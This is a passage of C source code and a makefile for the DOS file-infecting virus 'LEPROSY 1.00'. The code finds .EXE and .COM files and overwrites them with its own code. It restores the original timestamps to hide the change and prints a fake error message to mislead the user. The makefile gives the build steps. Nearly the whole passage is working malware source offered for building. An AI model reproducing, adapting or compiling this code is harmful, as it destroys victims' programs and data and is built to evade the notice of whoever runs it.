infect(); /* Well, then infect it! */
x++; /* Add one to the counter. */
success++; /* Carve a notch in our belt. */
}
else { /* If there ain't a file here... */
_DX = (int) ".."; /* See if we can step back to */
_AH = 0x3b; /* the parent directory, and try */
asm int 21H; /* there. */
x++; /* Increment the counter anyway, to */
} /* avoid infinite loops. */
} while( x < infection_rate ); /* Do this until we've had enough. */
if ( success ) /* If we got something this time, */
print_s( fake_msg ); /* feed 'em the phony error line. */
else
if ( diseased_count > 6 ) /* If we found 6+ infected files */
for( x = 0; x < 3; x++ ) /* along the way, laugh!! */
print_s( virus_msg[x] );
else
print_s( fake_msg ); /* Otherwise, keep a low profile. */
return;
}

void infect( void ) {
_DX = (int) dta->filename; /* DX register points to filename. */
_CX = 0x00; /* No attribute flags are set. */
_AL = 0x01; /* Use Set Attribute sub-function. */
_AH = 0x43; /* Assure access to write file. */
asm int 21H; /* Call DOS interrupt. */
open_handle( dta->filename ); /* Re-open the healthy file. */
_BX = handle; /* BX register holds handle. */
_CX = virus_size; /* Number of bytes to write. */
_DX = (int) codestart; /* Write program code. */
_AH = 0x40; /* Set up and call DOS. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close file. */
return;
}

int find_healthy( void ) {
if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */
if ( healthy() ) /* If it's healthy, OK! */
return 1;
else
while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */
if ( healthy() )
return 1; /* If you find one, great! */
return 0; /* Otherwise, say so. */
}

int healthy( void ) {
int i;
datestamp = dta->datestamp; /* Save time & date for later. */
timestamp = dta->timestamp;
open_handle( dta->filename ); /* Open last file located. */
_BX = handle; /* BX holds current file handle. */
_CX = 20; /* We only want a few bytes. */
_DX = (int) compare_buf; /* DX points to the scratch buffer. */
_AH = 0x3f; /* Read in file for comparison. */
asm int 21H;
restore_timestamp(); /* Keep original date & time. */
close_handle(); /* Close the file. */
for ( i = 0; i < 20; i++ ) /* Compare to virus code. */
if ( compare_buf[i] != *(codestart+i) )
return 1; /* If no match, return healthy. */
diseased_count++; /* Chalk up one more fucked file. */
return 0; /* Otherwise, return infected. */
}

void restore_timestamp( void ) {
_AL = 0x01; /* Keep original date & time. */
_BX = handle; /* Same file handle. */
_CX = timestamp; /* Get time & date from DTA. */
_DX = datestamp;
_AH = 0x57; /* Do DOS service. */
asm int 21H;
return;
}

void print_s( char *s ) {
char *p = s;
while ( *p ) { /* Subtract 10 from every character. */
*p -= 10;
p++;
}
_DX = (int) s; /* Set DX to point to adjusted string. */
_AH = 0x09; /* Set DOS function number. */
asm int 21H; /* Call DOS interrupt. */
return;
}

int find_first( char *fn ) {
_DX = (int) fn; /* Point DX to the file name. */
_CX = 0xff; /* Search for all attributes. */
_AH = 0x4e; /* 'Find first' DOS service. */
asm int 21H; /* Go, DOS, go. */
return _AX; /* Return possible error code. */
}

int find_next( void ) {
_AH = 0x4f; /* 'Find next' function. */
asm int 21H; /* Call DOS. */
return _AX; /* Return any error code. */
}

void open_handle( char *fn ) {
_DX = (int) fn; /* Point DX to the filename. */
_AL = 0x02; /* Always open for both read & write. */
_AH = 0x3d; /* "Open handle" service. */
asm int 21H; /* Call DOS. */
handle = _AX; /* Assume handle returned OK. */
return;
}

void close_handle( void ) {
_BX = handle; /* Load BX register w/current file handle. */
_AH = 0x3e; /* Set up and call DOS service. */
asm int 21H;
return;
}
# makefile for LEPROSY Virus 1.00 by PCM2

leprosy.com: leprosy.obj c0t.obj
tlink /x /t c0t+leprosy,leprosy,,

c0t.obj: c0t.asm
tasm c0t

leprosy.obj: leprosy.asm
tasm leprosy

leprosy.asm: leprosy.c
tcc -mt -f- -K -S leprosy

guru of networks